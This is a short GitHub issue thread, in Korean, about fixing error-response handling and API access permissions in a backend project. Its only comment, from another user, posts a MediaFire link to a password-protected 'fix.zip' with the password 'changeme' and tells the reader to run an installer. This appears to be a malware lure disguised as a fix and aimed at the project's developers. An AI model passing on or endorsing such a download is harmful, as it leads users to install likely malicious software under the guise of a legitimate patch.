### ISSUE TITLE
[FIX] 에러 응답 처리 수정

### ISSUE THREAD

**Issue by bbwest0709** [wanted-pre-onboarding-backend-team-7/BABA#79]
## 📱 Description

- 에러 응답 처리 수정

## 📱 To-do

- [x] 수정
- [x] 회원관리 및 관련 API 경로 접근 권한 허용

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
